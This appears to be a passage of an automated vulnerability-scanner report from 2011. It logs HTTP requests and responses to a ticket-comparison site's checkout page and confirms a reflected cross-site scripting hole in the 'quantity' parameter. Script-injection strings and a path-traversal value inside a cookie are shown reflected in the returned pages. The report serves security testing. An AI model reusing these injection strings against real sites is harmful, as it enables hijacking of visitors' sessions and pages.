hbWUiFkRhbGxhcy1Gb3J0IFdvcnRoOhRtYV9kaXNwbGF5X25hbWVADjoSbGFzdF9hY2Nlc3NlZEl1OglUaW1lDXLaG4DOaiWaBjoLb2Zmc2V0af6QnToLc3JjX2lkaQH%2FOgdscEkiAf9odHRwOi8vYmluZy5mYW5zbmFwLmNvbS9jaGVja291dC9pbmRleC80MTg1NjMxNzk%2FY3R4PWMlM0R0aXglM0JtdCUzRGludCUzQnRzcCUzRDAlM0JkdCUzRDElM0JscG9zJTNEMiZjaD0lM0UlM0Mvc2NyaXB0JTNFJTNDc2NyaXB0JTNFbmV0c3Bhcmtlcig5KSUzQy9zY3JpcHQlM0UmcXVhbnRpdHk9MiZscD10cnVlJnBvY3R4PXJhbmslM0QzNiUzQmNyYXdsU2NvcmUlM0RudWxsJTNCcG9wMSUzRDAuMDM3NCUzQnBvcDIlM0QwLjAzNzQlM0Jwb3AzJTMGOwhGOgxyZWZlcmVyIgIuAWh0dHA6Ly9iaW5nLmZhbnNuYXAuY29tL2NoZWNrb3V0L2luZGV4LzQxODU2MzE3OT9jdHg9YyUzRHRpeCUzQm10JTNEaW50JTNCdHNwJTNEMCUzQmR0JTNEMSUzQmxwb3MlM0QyJmNoPWJpbmcmcXVhbnRpdHk9MiZscD10cnVlJnBvY3R4PXJhbmslM0QzNiUzQmNyYXdsU2NvcmUlM0RudWxsJTNCcG9wMSUzRDAuMDM3NCUzQnBvcDIlM0QwLjAzNzQlM0Jwb3AzJTNEMC4wMzc0JTNCJmFmbT0mdWV0PS03NzY4OTY4MzYlM0E3OTI1JTNBcGdzdGlja2V0cyU3QyU3Q2JpbmclN0NtdCUzQWludCUzQnN6JTNBMTI1NCUzQmlkJTNBMzg5NjY5Og12aXNpdF9pZGkErXNvPToPdmlzaXRvcl9pZCIVMTM0MjU2NzAwMjEwNjg4MToOc3R5bGVfaWRzSSIABjsIRjoIbG9jewo7DmYaMzIuNzgyNDk5OTk5OTk5OTk5AI9cOw9mGy05Ni44MjA3MDAwMDAwMDAwMDIA9PE7EGkSOxEiFkRhbGxhcy1Gb3J0IFdvcnRoOxJAFw%3D%3D--3432526aec1ad560133c5a427621e6286589d495; domain=fansnap.com; path=/; HttpOnly
Status: 200
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 3807
Connection: close
Content-Type: text/html; charset=utf-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang='en' xml:lang='en' xmlns:fb='http://www.facebook.com/2008/fbml' xmlns:og='http://opengraphprotocol.org/schema/' xmlns:v='urn:schemas-microsoft-com:vml' xmlns='http://www.w3.org/1999/xhtml'><head><meta content='text/html;charset=UTF-8' http-equiv='content-type' /><meta content='Compare sports tickets, concert tickets, and theatre tickets from 50+ sites all at once. Find best values fast!' name='description' /><meta content='sports tickets, concert tickets, theatre tickets, cheap tickets, NFL tickets, NBA tickets, NCAA tickets, MLB tickets, NHL tickets' name='keywords' /><meta content='55311985224' property='fb:page_id' /><meta content='Taking you to provider site | FanSnap - Ticket Search' property='og:title' /><meta content='Compare sports tickets, concert tickets, and theatre tickets from 50+ sites all at once. Find best values fast!' property='og:description' /><meta content='http://cdn-1.fansnap.com/REL-fansnap-1.20.2-r31787/images/fansnap-logo-sm.png?REL-fansnap-1.20.2-r31787' property='og:image' /><title>Taking you to provider site | FanSnap - Ticket Search</title><link href="http://cdn-2.fansnap.com/REL-fansnap-1.20.2-r31787/stylesheets/css/style-fs-defaultgz.css?REL-fansnap-1.20.2-r31787" media="screen" rel="stylesheet" type="text/css" /><!--[if lte IE 6]><link href="http://cdn-1.fansnap.com/REL-fansnap-1.20.2-r31787/stylesheets/css/style-fs-ie6gz.css?REL-fansnap-1.20.2-r31787" media="screen" rel="stylesheet" type="text/css" /><![endif]--><script type='text/javascript'> //<![CDATA[ function resizeInclusion(id){ var height; if (id && document.getElementById(id)){ if (typeof(document.getElementById(id).contentWindow) == 'undefined') height = document.getElementById(id).document.body.scrollHeight; else height = document.getElementById(id).contentWindow.document.body.scrollHeight; document.getElementById(id).style.height = height + "px"; } }; //]]></script></head><body class='checkoutcontroller index '><div id='doc4'><div id='hd'></div><div id='bd'><div class='interstitial leaving'><div class='interstitial-top'></div><div class='interstitial-btm'></div><div id='checkout_desired_quantity' style='display:none'><div class='leftside'><h2>Please select the number of tickets</h2><p>Once you select a quantity, we'll take you to StubHub.</p><p><select class="quantity desired_quantity" name="desired_quantity"><option value="2">2 tickets</option></select></p><div class='continue'><input onclick='CheckoutInterstitialController.setQuantity()' style='cursor: pointer' type='button' value='Go' /><a href="#" onclick="window.close()">Return</a></div></div></div><div id='checkout_leaving' style=''><div id='interstitial_display'><div class='leftside'><div class='notice'>You are leaving FanSnap</div><div class='broker-info'><div class='broker-logo'><div class='broker-spinner'>now taking you to:</div></div><div class='broker-img'><img alt="Provider-large-511" src="http://cdn-3.fansnap.com/REL-fansnap-1.20.2-r31787/images/logos/provider-large-511.gif?REL-fansnap-1.20.2-r31787" /></div><div class='clear'></div></div><div class='broker-msg'><b>Member:</b> BBB</div><div class='broker-instructions'><p><strong>StubHub</strong>can answer any questions regarding your purchase.</p></div></div><div class='clear'></div></div></div><div id='checkout_sold_out' style='display:none'><div class='leftside'><h2>Sorry! Another fan just bought those.</h2><p>You'll be returned to FanSnap in 5 seconds. Click below to return immediately.</p><div class='continue'><a href="#" onclick="window.close()">Return</a></div></div><div class='clear'></div></div><div id='checkout_price_changed' style='display:none'><form action='/checkout/clickout' class='confirmForm' method='get'><div class='leftside'><h2>The price has changed</h2><p><span class="price_str"></span>.</p><div class='continue'><input name="id" type="hidden" value="418563179" /><input name="quantity" type="hidden" value="2" /><input name="ctx" type="hidden" value="c=tix;mt=int;tsp=0;dt=1;lpos=2" /><input name="commit" type="submit" value="Go" /><a href="#" onclick="window.close()">Return</a></div></div></form></div><div id='checkout_quantity_changed' style='display:none'><div class='leftside'><h2>The quantity has changed</h2><p>Sorry! Another fan has bought some of these tickets.</p><form action='/checkout/clickout' class='confirmForm' method='get'><p><input name="id" type="hidden" value="418563179" /><input name="ctx" type="hidden" value="c=tix;mt=int;tsp=0;dt=1;lpos=2" /><select class="quantity quantity_only" name="quantity"><option value="0">Choose...</option></select><span class='select_quantity_prompt' style='visibility: hidden; color: red;'><-- Please select.</span></p><div class='continue'><input class="confirm_quantity_changed" name="commit" type="submit" value="Go" /><a href="#" onclick="window.close()">Return</a></div></form></div></div><div id='checkout_price_and_quantity_changed' style='display:none'><form action='/checkout/clickout' class='confirmForm' method='get'><div class='leftside'><h2>The price and quantity has changed</h2><p><span class="price_str"></span>. Also, another fan just bought some of these tickets.</p><p>Please choose another quanity:</p><p><input name="id" type="hidden" value="418563179" /><input name="ctx" type="hidden" value="c=tix;mt=int;tsp=0;dt=1;lpos=2" /><select class="quantity quantity_and_price" name="quantity"><option value="0">Choose...</option></select><span class='select_quantity_prompt' style='visibility: hidden; color: red;'><-- Please select.</span></p><div class='continue'><input class="confirm_price_and_quantity_changed" name="commit" type="submit" value="Go" /><a href="#" onclick="window.close()">Return</a></div></div></form></div><div id='checkout_error' style='display:none'><div class='leftside'><h2>An error has occurred</h2><p>Sorry, we cannot take you to the provider site to purchase these tickets at this time. We have been notified of this problem. You'll be returned FanSnap in 5 seconds. Click below to return immediately.</p><p class='continue'><a href="#" onclick="window.close()">Return</a></p></div></div><img alt="" height="1" id="affiliatePixel" src="http://cdn-0.fansnap.com/REL-fansnap-1.20.2-r31787/images/1px.png?REL-fansnap-1.20.2-r31787" style="position: absolute; z-index: 9999;" width="1" /></div></div><div class='clear'></div><div id='ft'><div id='footer'>&copy; 2008-2011 FanSnap, Inc.&nbsp;-&nbsp;<a href="/about">About FanSnap</a>&nbsp;-&nbsp;<a href="/blog">Blog</a>&nbsp;-&nbsp;<a href="/providers">Partners</a>&nbsp;-&nbsp;<a href="/developers">Developers</a>&nbsp;-&nbsp;<a href="/developers/affiliates">Affiliates</a>&nbsp;-&nbsp;<a href="/contact">Contact</a>&nbsp;-&nbsp;<a href="/privacy">Privacy</a>&nbsp;-&nbsp;<a href="/sitemap">Site Map</a>&nbsp;-&nbsp;<a href="/venues">Event Venues</a>&nbsp;-&nbsp;<a href="/metro-areas">Metro Areas</a></div></div></div><div id='locationModal'><form action='#' id='changeLocationForm'><label>Zip Code:</label><input id="zipcode" name="zipcode" type="text" /><input id="saveLocation" name="commit" type="submit" value="Change" /><div id='cancelLocation'></div></form></div><div class='sp1'></div><div class='clear'></div><script type="text/javascript">//<![CDATA[var fsi__ = { ch: 'fs', srv: 'ip-10-250-87-175', bld: 'REL-fansnap-1.20.2-r31787', vstId: 1030714285, usr: {id: null, e: null}, st: ''};//]]></script><script src="http://cdn-0.fansnap.com/REL-fansnap-1.20.2-r31787/javascripts/bundlegz.js?REL-fansnap-1.20.2-r31787" type="text/javascript"></script><script type='text/javascript'> //<![CDATA[ fsTop.assetHost = 'http://cdn-%d.fansnap.com/REL-fansnap-1.20.2-r31787'; fsTop.assetVersion = 'REL-fansnap-1.20.2-r31787'; //]]></script><script type="text/javascript">//<![CDATA[fsTop.channel = new Channel({"code":null,"id":1,"name":"fs"}, true, "fansnap.com");//]]></script><script src="http://cdn-1.fansnap.com/REL-fansnap-1.20.2-r31787/javascripts/bundle2.js?REL-fansnap-1.20.2-r31787" type="text/javascript"></script><script src="http://cdn-0.fansnap.com/REL-fansnap-1.20.2-r31787/javascripts/checkout_interstitial.js?REL-fansnap-1.20.2-r31787" type="text/javascript"></script><script type="text/javascript">//<![CDATA[LoggerUtil.initialize(true)//]]></script><script type="text/javascript">//<![CDATA[PageUet.initialize('seats-uet', '-776896836:7925:pgscheckout','','bing',{tag:'mt:int;sz:1254;id:389669'})//]]></script><script type="text/javascript">//<![CDATA[CheckoutInterstitialController.initialize({fbConnect: false, skipPingout: false, ticketSetId: 418563179, quantity: 2, ctx: escape('c=tix;mt=int;tsp=0;dt=1;lpos=2'), fakeResult: 'none', salePrice: 62.0, roundedPrice: 62, split: ["2"], requestQty: false, channel: '></script><script>netsparker(9)</script>', poctx: 'rank=36;crawlScore=null;pop1=0.0374;pop2=0.0374;pop3=0.0374;', afm: '3' });//]]></script><div class='fansnaptron' id='fbAuthModal'><iframe allowtransparency='true' frameborder='0' id='fbAuthTarget' marginheight='0' marginwidth='0' scrolling='no'></iframe><div class='fbAuthModalClose'><a class='fbAuthClose'>Close</a></div></div><div class='survey-confirm' id='fsAuthModal'><iframe allowtransparency='true' frameborder='0' id='fsAuthTarget' marginheight='0' marginwidth='0' scrolling='no'></iframe><div class='fsAuthModalClose'><a class='fsAuthClose'><img alt="Cancel" src="http://cdn-1.fansnap.com/REL-fansnap-1.20.2-r31787/images/cancel.png?REL-fansnap-1.20.2-r31787" /></a></div></div><script src='http://www.google-analytics.com/urchin.js' type='text/javascript'></script><script type='text/javascript'> //<![CDATA[ _uacct = "UA-4075898-1"; _udn = "fansnap.com"; urchinTracker(); //]]></script><div id='fb-root'></div><script type='text/javascript'> //<![CDATA[ var locationChangePosition; $('#locationModal').jqm({overlay:0, trigger: false, onShow: function(h){ h.w.css({top: locationChangePosition.pageY, left: locationChangePosition.pageX}).show(); } }); function changeLocationHandler(e){ locationChangePosition = {pageX: e.clientX, pageY: e.clientY}; $('#locationModal').jqmShow(); return false; } $('#cancelLocation').click(function(){ $('#locationModal').jqmHide(); return false; }); $('#changeLocationForm').submit(function(){ $.cookie('zipcode', $('input#zipcode').val(), { path: '/'}); $('#locationModal').jqmHide(); window.location.href = window.location.href; return false; }); //]]></script><script type='text/javascript'> //<![CDATA[ window.fbAsyncInit = function() { FB.init({appId: '105579996199059', status: true, cookie: true, xfbml: true}); }; (function() { var e = document.createElement('script'); e.async = true; e.src = document.location.protocol + '//connect.facebook.net/en_US/all.js'; document.getElementById('fb-root').appendChild(e); }()); //]]></script><script type='text/javascript'> //<![CDATA[ $(function(){ try{ FSAuthentication.init({myBindHost: 'www.fansnap.com', parentHost: 'bing.fansnap.com', parentProtocol: 'http://', isLoggedIn: false, showLocation: true}); }catch(e){ } }); //]]></script><img alt='imgtrkp' height='1' src='/la/pi?m=_uid%3D1030714285%3A1342567002106881%3Apgscheckout%7C%252Fcheckout%252Findex%252F418563179%26_ctx%3D%26_ts%3D1311100714%26_st%3D%26_ma%3D13%26_ref%3Dhttp%253A%252F%252Fbing.fansnap.com%252Fcheckout%252Findex%252F418563179%253Fctx%253Dc%25253Dtix%25253Bmt%25253Dint%25253Btsp%25253D0%25253Bdt%25253D1%25253Blpos%25253D2%2526ch%253Dbing%2526quantity%253D2%2526lp%253Dtrue%2526poctx%253Drank%25253D36%25253BcrawlScore%25253Dnull%25253Bpop1%25253D0.0374%25253Bpop2%25253D0.0374%25253Bpop3%25253D0.0374%25253B%2526afm%253D%2526uet%253D-776896836%25253A7925%25253Apgstickets%25257C%25257Cbing%25257Cmt%25253Aint%25253Bsz%25253A1254%25253Bid%25253A389669' width='1' /></body></html>
- /checkout/index/418563179

/checkout/index/418563179 CONFIRMED

http://bing.fansnap.com/checkout/index/418563179?ctx=c%3Dtix%3Bmt%3Dint%3Btsp%3D0%3Bdt%3D1%3Blpos%3D..

Parameters

Parameter Type Value
ctx GET c=tix;mt=int;tsp=0;dt=1;lpos=2
ch GET bing
quantity GET '"--></style></script><script>alert(0x000018)</script>
lp GET true
poctx GET rank=36;crawlScore=null;pop1=0.0374;pop2=0.0374;pop3=0.0374;
afm GET 3
uet GET -776896836:7925:pgstickets||bing|mt:int;sz:1254;id:389669

Request

GET /checkout/index/418563179?ctx=c%3Dtix%3Bmt%3Dint%3Btsp%3D0%3Bdt%3D1%3Blpos%3D2&ch=bing&quantity='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000018)%3C/script%3E&lp=true&poctx=rank%3D36%3BcrawlScore%3Dnull%3Bpop1%3D0.0374%3Bpop2%3D0.0374%3Bpop3%3D0.0374%3B&afm=3&uet=-776896836%3A7925%3Apgstickets%7C%7Cbing%7Cmt%3Aint%3Bsz%3A1254%3Bid%3A389669 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: bing.fansnap.com
Cookie: POOLID=B; bg_ver=1; bg_vid=1342567062754305; tvid=1342567045545985; _fancat_session=BAh7DjoPc2Vzc2lvbl9pZCIlNjNjY2U2NTJiNzhiMmIzMWQ1MWRhNzJiYTI4YzMyYzI6DmJnX3NyY19pZGkB%2FzoKYmdfbHBJIgH%2FaHR0cDovL2JpbmcuZmFuc25hcC5jb20vY2hlY2tvdXQvaW5kZXgvNDE4NTYzMTc5P2N0eD1jJTNEdGl4JTNCbXQlM0RpbnQlM0J0c3AlM0QwJTNCZHQlM0QxJTNCbHBvcyUzRDImY2g9YmluZyZxdWFudGl0eT0yJmxwPXRydWUmcG9jdHg9Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL2h0dHBkL2xvZ3MvZXJyb3IubG9nJmFmbT0zJnVldD0tNzc2ODk2ODM2JTNBNzkyNSUzQXBnc3RpY2tldHMlN0MlN0NiaW5nJTdDbXQlM0FpbnQlM0JzBjoGRUY6D2JnX3JlZmVyZXIiAi4BaHR0cDovL2JpbmcuZmFuc25hcC5jb20vY2hlY2tvdXQvaW5kZXgvNDE4NTYzMTc5P2N0eD1jJTNEdGl4JTNCbXQlM0RpbnQlM0J0c3AlM0QwJTNCZHQlM0QxJTNCbHBvcyUzRDImY2g9YmluZyZxdWFudGl0eT0yJmxwPXRydWUmcG9jdHg9cmFuayUzRDM2JTNCY3Jhd2xTY29yZSUzRG51bGwlM0Jwb3AxJTNEMC4wMzc0JTNCcG9wMiUzRDAuMDM3NCUzQnBvcDMlM0QwLjAzNzQlM0ImYWZtPSZ1ZXQ9LTc3Njg5NjgzNiUzQTc5MjUlM0FwZ3N0aWNrZXRzJTdDJTdDYmluZyU3Q210JTNBaW50JTNCc3olM0ExMjU0JTNCaWQlM0EzODk2Njk6EGJnX3Zpc2l0X2lkaQTP0ZoJOhJiZ192aXNpdG9yX2lkSSIVMTM0MjU2NzA2Mjc1NDMwNQY7CEY6EWJnX3N0eWxlX2lkc0kiAAY7CEY6C2JnX2xvY3sKOghsYXRmGjMyLjc4MjQ5OTk5OTk5OTk5OQCPXDoIbG5nZhstOTYuODIwNzAwMDAwMDAwMDAyAPTxOhBtYXJrZXRfYXJlYWkSOhFkaXNwbGF5X25hbWUiFkRhbGxhcy1Gb3J0IFdvcnRoOhRtYV9kaXNwbGF5X25hbWVADjoSbGFzdF9hY2Nlc3NlZEl1OglUaW1lDXLaG4BuIT%2BaBjoLb2Zmc2V0af6QnQ%3D%3D--d5199848bf582d7e645fe0a731bdb94d77134423; bg_lvd=1311100649; ver=1; vid=1342567002106881; lvd=1311100713
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Tue, 19 Jul 2011 18:38:36 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.6
P3P: CP="IDC DSP COR CURa ADMa OUR IND ONL COM STA"
X-Runtime: 18
ETag: "19675fc028b66ddac935bef0ad3533dc"
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: _fancat_session=BAh7DjoPc2Vzc2lvbl9pZCIlNjNjY2U2NTJiNzhiMmIzMWQ1MWRhNzJiYTI4YzMyYzI6DmJnX3NyY19pZGkB%2FzoKYmdfbHBJIgH%2FaHR0cDovL2JpbmcuZmFuc25hcC5jb20vY2hlY2tvdXQvaW5kZXgvNDE4NTYzMTc5P2N0eD1jJTNEdGl4JTNCbXQlM0RpbnQlM0J0c3AlM0QwJTNCZHQlM0QxJTNCbHBvcyUzRDImY2g9YmluZyZxdWFudGl0eT0yJmxwPXRydWUmcG9jdHg9Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL2h0dHBkL2xvZ3MvZXJyb3IubG9nJmFmbT0zJnVldD0tNzc2ODk2ODM2JTNBNzkyNSUzQXBnc3RpY2tldHMlN0MlN0NiaW5nJTdDbXQlM0FpbnQlM0JzBjoGRUY6D2JnX3JlZmVyZXIiAi4BaHR0cDovL2JpbmcuZmFuc25hcC5jb20vY2hlY2tvdXQvaW5kZXgvNDE4NTYzMTc5P2N0eD1jJTNEdGl4JTNCbXQlM0RpbnQlM0J0c3AlM0QwJTNCZHQlM0QxJTNCbHBvcyUzRDImY2g9YmluZyZxdWFudGl0eT0yJmxwPXRydWUmcG9jdHg9cmFuayUzRDM2JTNCY3Jhd2xTY29yZSUzRG51bGwlM0Jwb3AxJTNEMC4wMzc0JTNCcG9wMiUzRDAuMDM3NCUzQnBvcDMlM0QwLjAzNzQlM0ImYWZtPSZ1ZXQ9LTc3Njg5NjgzNiUzQTc5MjUlM0FwZ3N0aWNrZXRzJTdDJTdDYmluZyU3Q210JTNBaW50JTNCc3olM0ExMjU0JTNCaWQlM0EzODk2Njk6EGJnX3Zpc2l0X2lkaQTP0ZoJOhJiZ192aXNpdG9yX2lkSSIVMTM0MjU2NzA2Mjc1NDMwNQY7CEY6EWJnX3N0eWxlX2lkc0kiAAY7CEY6C2JnX2xvY3sKOghsYXRmGjMyLjc4MjQ5OTk5OTk5OTk5OQCPXDoIbG5nZhstOTYuODIwNzAwMDAwMDAwMDAyAPTxOhBtYXJrZXRfYXJlYWkSOhFkaXNwbGF5X25hbWUiFkRhbGxhcy1Gb3J0IFdvcnRoOhRtYV9kaXNwbGF5X25hbWVADjoSbGFzdF9hY2Nlc3NlZEl1OglUaW1lDXLaG4DXoUCaBjoLb2Zmc2V0af6QnQ%3D%3D--d4860acf5731807490db199f78c8cae0dc871001; domain=fansnap.com; path=/; HttpOnly
Status: 200
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 3639
Connection: close
Content-Type: text/html; charset=utf-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang='en' xml:lang='en' xmlns:fb='http://www.facebook.com/2008/fbml' xmlns:og='http://opengraphprotocol.org/schema/' xmlns:v='urn:schemas-microsoft-com:vml' xmlns='http://www.w3.org/1999/xhtml'><head><meta content='text/html;charset=UTF-8' http-equiv='content-type' /><meta content='Compare sports tickets, concert tickets, and theatre tickets from 50+ sites all at once. Find best values fast!' name='description' /><meta content='sports tickets, concert tickets, theatre tickets, cheap tickets, NFL tickets, NBA tickets, NCAA tickets, MLB tickets, NHL tickets' name='keywords' /><meta content='55311985224' property='fb:page_id' /><meta content='Taking you to provider site | Bing - Ticket Search' property='og:title' /><meta content='Compare sports tickets, concert tickets, and theatre tickets from 50+ sites all at once. Find best values fast!' property='og:description' /><meta content='http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/fansnap-logo-sm.png?REL-fansnap-1.20.2-r31787' property='og:image' /><title>Taking you to provider site | Bing - Ticket Search</title><link href="http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/stylesheets/css/style-bg-defaultgz.css?REL-fansnap-1.20.2-r31787" media="screen" rel="stylesheet" type="text/css" /><!--[if lte IE 6]><link href="http://cdn-3.f6img.com/REL-fansnap-1.20.2-r31787/stylesheets/css/style-bg-ie6gz.css?REL-fansnap-1.20.2-r31787" media="screen" rel="stylesheet" type="text/css" /><![endif]--><script type='text/javascript'> //<![CDATA[ function resizeInclusion(id){ var height; if (id && document.getElementById(id)){ if (typeof(document.getElementById(id).contentWindow) == 'undefined') height = document.getElementById(id).document.body.scrollHeight; else height = document.getElementById(id).contentWindow.document.body.scrollHeight; document.getElementById(id).style.height = height + "px"; } }; //]]></script></head><body class='checkoutcontroller index '><div id='doc4'><div id='hd'></div><div id='bd'><div class='interstitial leaving'><div class='interstitial-top'></div><div class='interstitial-btm'></div><div id='checkout_desired_quantity' style='display:none'><div class='leftside'><h2>Please select the number of tickets</h2><p>Once you select a quantity, we'll take you to StubHub.</p><p><select class="quantity desired_quantity" name="desired_quantity"><option value="2">2 tickets</option></select></p><div class='continue'><input onclick='CheckoutInterstitialController.setQuantity()' style='cursor: pointer' type='button' value='Go' /><a href="#" onclick="window.close()">Return</a></div></div></div><div id='checkout_leaving' style=''><div id='interstitial_display'><div class='leftside'><div class='notice'>You are leaving Bing events, powered by FanSnap</div><div class='broker-info'><div class='broker-logo'><div class='broker-spinner'>now taking you to:</div></div><div class='broker-img'><img alt="Provider-large-511" src="http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-large-511.gif?REL-fansnap-1.20.2-r31787" /></div><div class='clear'></div></div><div class='broker-msg'><b>Member:</b> BBB</div><div class='broker-instructions'><p><strong>StubHub</strong>can answer any questions regarding your purchase.</p></div></div><div class='clear'></div></div></div><div id='checkout_sold_out' style='display:none'><div class='leftside'><h2>Sorry! Another fan just bought those.</h2><p>You'll be returned to Bing in 5 seconds. Click below to return immediately.</p><div class='continue'><a href="#" onclick="window.close()">Return</a></div></div><div class='clear'></div></div><div id='checkout_price_changed' style='display:none'><form action='/checkout/clickout' class='confirmForm' method='get'><div class='leftside'><h2>The price has changed</h2><p><span class="price_str"></span>.</p><div class='continue'><input name="id" type="hidden" value="418563179" /><input name="quantity" type="hidden" value="'&quot;--&gt;&lt;/style&gt;&lt;/script&gt;&lt;script&gt;netsparker(0x000018)&lt;/script&gt;" /><input name="ctx" type="hidden" value="c=tix;mt=int;tsp=0;dt=1;lpos=2" /><input name="commit" type="submit" value="Go" /><a href="#" onclick="window.close()">Return</a></div></div></form></div><div id='checkout_quantity_changed' style='display:none'><div class='leftside'><h2>The quantity has changed</h2><p>Sorry! Another fan has bought some of these tickets.</p><form action='/checkout/clickout' class='confirmForm' method='get'><p><input name="id" type="hidden" value="418563179" /><input name="ctx" type="hidden" value="c=tix;mt=int;tsp=0;dt=1;lpos=2" /><select class="quantity quantity_only" name="quantity"><option value="0">Choose...</option></select><span class='select_quantity_prompt' style='visibility: hidden; color: red;'><-- Please select.</span></p><div class='continue'><input class="confirm_quantity_changed" name="commit" type="submit" value="Go" /><a href="#" onclick="window.close()">Return</a></div></form></div></div><div id='checkout_price_and_quantity_changed' style='display:none'><form action='/checkout/clickout' class='confirmForm' method='get'><div class='leftside'><h2>The price and quantity has changed</h2><p><span class="price_str"></span>. Also, another fan just bought some of these tickets.</p><p>Please choose another quanity:</p><p><input name="id" type="hidden" value="418563179" /><input name="ctx" type="hidden" value="c=tix;mt=int;tsp=0;dt=1;lpos=2" /><select class="quantity quantity_and_price" name="quantity"><option value="0">Choose...</option></select><span class='select_quantity_prompt' style='visibility: hidden; color: red;'><-- Please select.</span></p><div class='continue'><input class="confirm_price_and_quantity_changed" name="commit" type="submit" value="Go" /><a href="#" onclick="window.close()">Return</a></div></div></form></div><div id='checkout_error' style='display:none'><div class='leftside'><h2>An error has occurred</h2><p>Sorry, we cannot take you to the provider site to purchase these tickets at this time. We have been notified of this problem. You'll be returned Bing in 5 seconds. Click below to return immediately.</p><p class='continue'><a href="#" onclick="window.close()">Return</a></p></div></div><img alt="" height="1" id="affiliatePixel" src="http://cdn-0.f6img.com/REL-fansnap-1.20.2-r31787/images/1px.png?REL-fansnap-1.20.2-r31787" style="position: absolute; z-index: 9999;" width="1" /></div></div><div class='clear'></div><div id='ft'><div id='footer'>&copy; 2008-2011 FanSnap, Inc.&nbsp;-&nbsp;<a href="/about">About FanSnap</a>&nbsp;-&nbsp;<a href="/blog">Blog</a>&nbsp;-&nbsp;<a href="/providers">Partners</a>&nbsp;-&nbsp;<a href="/developers">Developers</a>&nbsp;-&nbsp;<a href="/developers/affiliates">Affiliates</a>&nbsp;-&nbsp;<a href="/contact">Contact</a>&nbsp;-&nbsp;<a href="/privacy">Privacy</a>&nbsp;-&nbsp;<a href="/sitemap">Site Map</a>&nbsp;-&nbsp;<a href="/venues">Event Venues</a>&nbsp;-&nbsp;<a href="/metro-areas">Metro Areas</a></div></div></div><div id='locationModal'><form action='#' id='changeLocationForm'><label>Zip Code:</label><input id="zipcode" name="zipcode" type="text" /><input id="saveLocation" name="commit" type="submit" value="Change" /><div id='cancelLocation'></div></form></div><div class='sp1'></div><div class='clear'></div><script type="text/javascript">//<![CDATA[var fsi__ = { ch: 'bing', srv: 'ip-10-250-26-209', bld: 'REL-fansnap-1.20.2-r31787', vstId: 161141199, usr: {id: null, e: null}, st: ''};//]]></script><script src="http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/javascripts/bundlegz.js?REL-fansnap-1.20.2-r31787" type="text/javascript"></script><script type='text/javascript'> //<![CDATA[ fsTop.assetHost = 'http://cdn-%d.f6img.com/REL-fansnap-1.20.2-r31787'; fsTop.assetVersion = 'REL-fansnap-1.20.2-r31787'; //]]></script><script type="text/javascript">//<![CDATA[fsTop.channel = new Channel({"code":"bg","id":7,"name":"bing"}, true, "fansnap.com");//]]></script><script src="http://cdn-3.f6img.com/REL-fansnap-1.20.2-r31787/javascripts/bg_bundle2.js?REL-fansnap-1.20.2-r31787" type="text/javascript"></script><script src="http://cdn-3.f6img.com/REL-fansnap-1.20.2-r31787/javascripts/checkout_interstitial.js?REL-fansnap-1.20.2-r31787" type="text/javascript"></script><script type="text/javascript">//<![CDATA[LoggerUtil.initialize(true)//]]></script><script type="text/javascript">//<![CDATA[PageUet.initialize('seats-uet', '-776896836:7925:pgscheckout','','bing',{tag:'mt:int;sz:1254;id:389669'})//]]></script><script type="text/javascript">//<![CDATA[CheckoutInterstitialController.initialize({fbConnect: false, skipPingout: false, ticketSetId: 418563179, quantity: '"--></style></script><script>netsparker(0x000018)</script>, ctx: escape('c=tix;mt=int;tsp=0;dt=1;lpos=2'), fakeResult: 'none', salePrice: 62.0, roundedPrice: 62, split: ["2"], requestQty: false, channel: 'bing', poctx: 'rank=36;crawlScore=null;pop1=0.0374;pop2=0.0374;pop3=0.0374;', afm: '3' });//]]></script><div class='fansnaptron' id='fbAuthModal'><iframe allowtransparency='true' frameborder='0' id='fbAuthTarget' marginheight='0' marginwidth='0' scrolling='no'></iframe><div class='fbAuthModalClose'><a class='fbAuthClose'>Close</a></div></div><div class='survey-confirm' id='fsAuthModal'><iframe allowtransparency='true' frameborder='0' id='fsAuthTarget' marginheight='0' marginwidth='0' scrolling='no'></iframe><div class='fsAuthModalClose'><a class='fsAuthClose'><img alt="Cancel" src="http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/cancel.png?REL-fansnap-1.20.2-r31787" /></a></div></div><div id='fb-root'></div><script type='text/javascript'> //<![CDATA[ var locationChangePosition; $('#locationModal').jqm({overlay:0, trigger: false, onShow: function(h){ h.w.css({top: locationChangePosition.pageY, left: locationChangePosition.pageX}).show(); } }); function changeLocationHandler(e){ locationChangePosition = {pageX: e.clientX, pageY: e.clientY}; $('#locationModal').jqmShow(); return false; } $('#cancelLocation').click(function(){ $('#locationModal').jqmHide(); return false; }); $('#changeLocationForm').submit(function(){ $.cookie('zipcode', $('input#zipcode').val(), { path: '/'}); $('#locationModal').jqmHide(); window.location.href = window.location.href; return false; }); //]]></script><script type='text/javascript'> //<![CDATA[ window.fbAsyncInit = function() { FB.init({appId: '105579996199059', status: true, cookie: true, xfbml: true}); }; (function() { var e = document.createElement('script'); e.async = true; e.src = document.location.protocol + '//connect.facebook.net/en_US/all.js'; document.getElementById('fb-root').appendChild(e); }()); //]]></script><script type='text/javascript'> //<![CDATA[ $(function(){ try{ FSAuthentication.init({myBindHost: 'www.fansnap.com', parentHost: 'bing.fansnap.com', parentProtocol: 'http://', isLoggedIn: 